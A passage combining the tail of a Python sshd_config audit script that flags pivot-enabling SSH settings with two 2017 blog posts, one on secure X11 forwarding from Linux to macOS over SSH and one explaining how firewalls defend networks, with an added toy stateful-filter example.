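# PermitRootLogin to prohibit-password, so adjust this table for the version you run).
DEFAULTS = {"permitrootlogin": "yes", "passwordauthentication": "yes",
            "allowtcpforwarding": "yes", "gatewayports": "no", "permittunnel": "no"}


def effective_settings(text):
    """Global settings as sshd resolves them: the first value seen for a keyword wins,
    and everything after the first Match line is conditional, so it is not global."""
    seen = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)     # "Key value" or "Key=value"
        key = parts[0].lower()
        if key == "match":
            break
        seen.setdefault(key, parts[1].lower() if len(parts) > 1 else "")
    return {**DEFAULTS, **seen}


def audit_pivot_exposure(settings):
    """Findings that let a login on this host become a pivot, as in the walkthrough above."""
    findings = []
    if settings["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root can log in with a password, so a recovered "
                        "root password alone is enough to reach this host remotely")
    if settings["passwordauthentication"] == "yes":
        findings.append("PasswordAuthentication yes: prefer keys so credentials found on "
                        "a compromised box cannot simply be replayed")
    if settings["allowtcpforwarding"] == "yes":
        findings.append("AllowTcpForwarding yes: any SSH login can tunnel -L/-R/-D through "
                        "this host to its other interfaces; disable it, or allow it only in "
                        "a Match block for the accounts that need it")
    if settings["gatewayports"] == "yes":
        findings.append("GatewayPorts yes: remote forwards bind on all interfaces")
    if settings["permittunnel"] != "no":
        findings.append("PermitTunnel: tun devices let a client route whole subnets through")
    return findings


# Constructed hardened counterpart: forwarding only for a group that needs it.
HARDENED = """\
PermitRootLogin no
PasswordAuthentication no
AllowTcpForwarding no
X11Forwarding yes
Match Group admins
    AllowTcpForwarding yes
"""

if __name__ == "__main__":
    for finding in audit_pivot_exposure(effective_settings(SSHD_CONFIG)):
        print("-", finding)
```

Note that the Match-block `AllowTcpForwarding no` in the sample applies to one user only; the global value is still the default yes, which is why the audit flags it.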

Sunday, July 2, 2017

Exporting X Session From Linux to Mac

I primarily work on Linux and Mac for different reasons; firstly for the fun of it, and I get to savour the best that these different operating systems have to offer. There are times I would like to take some dev work onto my Mac; however, the app resides on my Linux host and requires a graphical environment that is exclusive to my Linux host. This graphical session is known as the X Window System. With X Window, you can export graphical sessions to another host to run apps without having to install the app on the machine you are running it on! That means you can run Linux apps on a Mac or Windows host.

The traditional method was to export X Window using the 'xhost +myremotehost.com' and 'export DISPLAY=myremotehost.com:0.0' commands, but it also requires me to poke more holes in my firewall to allow the X Window session through. This method is not recommended, as there are known security risks associated with exporting X remotely: the session can be sniffed or, worse, hijacked. One way to securely export X Window is to use the built-in X11 forwarding function in OpenSSH. It allows you to export X Window via an SSH session that is encrypted by default.

On the Linux host where the graphical apps resides, ensure the following lines are enabled in /etc/ssh/sshd_config:

X11Forwarding yes

X11DisplayOffset 10

Make sure you restart/reload ssh after making changes.

If you are running macOS 10.x and above, you will need to download XQuartz. Unfortunately, newer macOS releases do not support the same X server that Linux does. Further instructions on where and how to download XQuartz can be found here.

Once that is done, on your Mac host, launch XQuartz -> Application -> xterm and ssh to your Linux host with the -X flag:


Once you have successfully authenticated, just launch your favourite X application:


There you go! You now have a Linux app that runs on Mac. Pretty cool huh? Well for me atleast :-p


Saturday, July 1, 2017

About Internet Firewalls

A firewall is primarily designed to reduce the exposed surface of hosts to unauthorised network hacking. Having a firewall installed, either at the ingress gateway or on the host, grants the administrator granular control of all network communication protocols that pass through it. Firewalls have been through at least 3 evolutions. The first generation were mere packet filters that intercepted network traffic passing through and compared its packet headers against a custom ruleset. The 2nd generation firewalls had a stateful table to track all packet and datagram sessions; it became possible to control the flow of handshake and teardown of communication protocols, an important factor in preventing Denial of Service (DoS) attacks. The 3rd generation firewalls further built in application intelligence: a hybrid of application proxies and stateful inspection technology. In this article, we will discuss the general approach of firewalls in protecting a network from malicious attack.

Figure depicts typical firewall layout

The first phase of an intrusion usually begins with enumeration, or probing. Finding out as much as possible about the intended target is essential to infiltrating it successfully. For example, a hacker usually runs a port scan against a target to identify the services/ports that are available. Once identified, the next step is to probe them for flaws or typical misconfigurations. Only after accurately fingerprinting the exact communication protocol and its inner workings will the hacker have an idea of how to exploit it further. This is where a firewall comes into the defence.


Figure depicts firewall handling incoming TCP handshake.

A firewall has a defined ruleset that controls the directional flow of every network communication protocol passing through it. It controls TCP/IP handshakes, dropping any communication that does not conform to the standard protocol. When a hacker tries to probe, the firewall detects the abnormality and denies the probe from further enumerating the hosts behind it. A firewall is not designed to stop hackers entirely: if a service protocol is allowed to pass through, that service remains susceptible to further attacks. This usually happens when common protocols such as HTTP traffic are publicly allowed, which is why web servers are commonly compromised/defaced.

Another role of the firewall is to stop Denial of Service (DoS) attacks. A DoS attack happens when a server receives a huge number of requests that overwhelms its resources, resulting in service degradation or total disruption. A common variant uses hundreds of previously compromised hosts, called bots, to send huge numbers of requests to the same host or network simultaneously; this is usually referred to as a Distributed Denial of Service (DDoS) attack. A properly configured firewall can detect the abnormality, either via unusual fluctuations in the volume of requests or via the spoofed IP addresses thrown at it. A stateful firewall maintains a connection table that tracks each connection, breaking down and inspecting each packet that comes through it.
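As an added illustration of the handshake control and connection table described in the two paragraphs above (example code written for this page, not from the original post): a toy stateful filter run over a constructed packet sequence using documentation-range addresses, with 10.0.0.x assumed to be the protected network. A real firewall also handles retransmissions, timeouts and UDP/ICMP state, which this toy omits.

```python
from collections import namedtuple

# Constructed packet: TCP flags as "S" (SYN), "SA" (SYN/ACK), "A", "PA", "F", "FA", "R".
Packet = namedtuple("Packet", "src sport dst dport flags")

class StatefulFirewall:
    """Toy 2nd-generation firewall: a directional ruleset plus a connection table."""
    def __init__(self, protected_prefix="10.0.0.", allowed_inbound_ports=(80, 443)):
        self.prefix = protected_prefix          # hosts behind the firewall (constructed)
        self.allowed = set(allowed_inbound_ports)  # services the ruleset exposes
        self.table = {}  # (client_ip, client_port, server_ip, server_port) -> TCP state

    def filter(self, p):
        fwd = (p.src, p.sport, p.dst, p.dport)  # packet travelling client -> server
        rev = (p.dst, p.dport, p.src, p.sport)  # packet travelling server -> client
        if fwd not in self.table and rev not in self.table:
            # Unknown flow: only a plain SYN may open one, and an inbound SYN must target
            # an exposed port. A stray ACK/RST/SYN-ACK with no session is a probe: drop it.
            if p.flags != "S":
                return "DROP: no session for " + p.flags
            if not p.src.startswith(self.prefix) and p.dport not in self.allowed:
                return "DROP: inbound port %d not allowed" % p.dport
            self.table[fwd] = "SYN_SENT"  # outbound is lax: inside hosts may reach any port
            return "ACCEPT"
        key = fwd if fwd in self.table else rev
        state = self.table[key]
        if state == "SYN_SENT" and key == rev and p.flags == "SA":
            self.table[key] = "SYN_RECEIVED"  # step 2 must come back from the server
        elif state == "SYN_RECEIVED" and key == fwd and p.flags == "A":
            self.table[key] = "ESTABLISHED"  # step 3 completes the handshake
        elif state == "ESTABLISHED" and p.flags in ("A", "PA"):
            pass  # data on an established session
        elif p.flags in ("F", "FA", "R"):
            del self.table[key]  # teardown removes the entry from the table
        else:
            return "DROP: %s out of order in %s" % (p.flags, state)
        return "ACCEPT"

def run_sample():
    """Verdicts for a constructed sequence: a clean handshake to the web server, a SYN
    probe to port 22, an ACK probe, an outbound connection, and a FIN on the first flow."""
    fw = StatefulFirewall()
    pkts = [Packet("198.51.100.7", 40000, "10.0.0.5", 80, "S"),
            Packet("10.0.0.5", 80, "198.51.100.7", 40000, "SA"),
            Packet("198.51.100.7", 40000, "10.0.0.5", 80, "A"),
            Packet("198.51.100.7", 40001, "10.0.0.5", 22, "S"),  # port scan hits a closed rule
            Packet("198.51.100.7", 40002, "10.0.0.5", 80, "A"),  # ACK scan: no session
            Packet("10.0.0.9", 51000, "203.0.113.9", 443, "S"),  # outbound, allowed
            Packet("198.51.100.7", 40000, "10.0.0.5", 80, "F")]
    return [v.split(":")[0] for v in map(fw.filter, pkts)], len(fw.table)
```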

Firewalls have evolved and continue to evolve; some provide advanced intelligence such as deep packet inspection, threat analysis and intrusion prevention built into them. Such firewalls are a successful hybrid of application proxy and stateful inspection technology. They provide intelligence to inspect the application layer of common unencrypted protocols such as HTTP, FTP, ICMP, SMTP, POP3, IMAP, DNS, etc. The wide adoption of TLS/SSL encryption has posed a challenge for application-aware firewalls: the firewall has to act as a Man-in-the-Middle (MitM), proxying the SSL certificates, in order to inspect the packets. Such an act further weakens the encryption between these hosts and, in my opinion, is not to be encouraged.




Figure depicts the MitM proxying of SSL traffic between Client and Server


Firewalls are about controlling the directional flow of network communication protocols, thus limiting the attack vectors. Firewalls are a staple solution for any Internet-facing host, and most modern Windows OS versions have a built-in firewall activated by default. This makes common attacks difficult for hackers, which is why methods of intrusion are also evolving towards client-side attacks, e.g. phishing, Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS). Such attacks are initiated from the client host, where firewall rules are commonly lax for outgoing or trusted connections, granting the hacker an opportunity to carry out devious deeds. For example, an unsuspecting user is sent a malicious attachment, a Word document, in an email claiming to be from his boss. He will most likely open it, and the malicious code embedded in it will exploit a vulnerability such as a Remote Code Execution (RCE) bug in SMBv1 on his Windows OS, triggering it to execute malware that encrypts the contents of his hard drive and further propagates itself to other hosts on his internal network using the same vulnerable service (SMBv1).


It is imperative that firewalls are independent of any dynamic routing protocol, to avoid poisoning of routes. Such activity is detrimental as it can be used to influence the access control that safeguards the network and hosts behind it.